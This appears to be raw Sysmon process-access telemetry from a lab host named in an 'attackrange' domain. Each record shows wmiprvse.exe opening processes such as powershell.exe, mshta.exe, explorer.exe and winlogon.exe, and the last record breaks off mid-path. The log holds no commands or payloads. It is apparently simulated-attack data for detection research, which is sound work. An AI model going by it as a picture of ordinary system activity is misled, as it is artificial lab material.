15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5363-6008-5D06-00000000A301}6844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025762Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025761Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025760Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025759Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025758Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025757Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025756Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025755Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025754Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025753Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025752Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025751Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025750Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025749Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025748Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025747Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025746Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.741{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025745Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025744Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025743Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program 